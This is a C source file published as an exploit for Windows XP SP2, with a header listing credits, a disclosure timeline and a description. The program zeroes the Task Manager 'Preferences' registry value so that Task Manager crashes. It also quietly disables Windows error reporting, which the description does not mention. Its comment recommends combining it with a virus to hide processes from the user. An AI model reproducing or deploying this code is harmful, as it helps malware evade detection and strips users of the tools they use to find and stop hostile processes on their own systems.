Exploit that demonstrates how the manipulation of a registry key in Microsoft Windows XP SP2 can disable the taskmanager.
72924758a2cd7b2bee11688185242cfe21c6a2f799feebfdf44715eaa66f897b
#include <windows.h>
/*
-=- Credits -=-
Coded by: SkyOut
Found by: Izee
Date: March 2008
Website: https://core-security.net/
-=- Timeline -=-
Discovering the bug: December 2006
Exploit coded: December 2006
[... over one year of waiting ...]
Phone call with Microsoft Germany: February 2008
Email sent to Microsoft Germany: February 2008
[... several weeks of waiting ...]
[... no reaction by Microsoft Germany ...]
Public release: March 2008
-=- Description -=-
By zeroing a REG_BINARY value in the Registry you can
disable the Taskmanager of Windows XP SP2. It will crash
on next startup.
-=- Possible way of using it -=-
Using this code together with a virus makes it possible to
hide your process to the user (instead he knows about using
the Registry in a right way and can repair it manually or has
a backup for this key).
-=- Tested on -=-
Windows XP SP2 (works)
Windows Vista SP0 (fixed)
*/
#pragma comment(lib, "advapi32.lib")
void TaskmngrDisableBug(void)
{
HKEY hKey;
DWORD dwData = 0;
BYTE bBuff[] = {00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00};
RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows NT\\CurrentVersion\\TaskManager", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "Preferences", 0, REG_BINARY, bBuff, sizeof(bBuff));
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "DoReport", 0, REG_DWORD, (LPBYTE)&dwData, sizeof(DWORD));
RegCloseKey(hKey);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
TaskmngrDisableBug();
}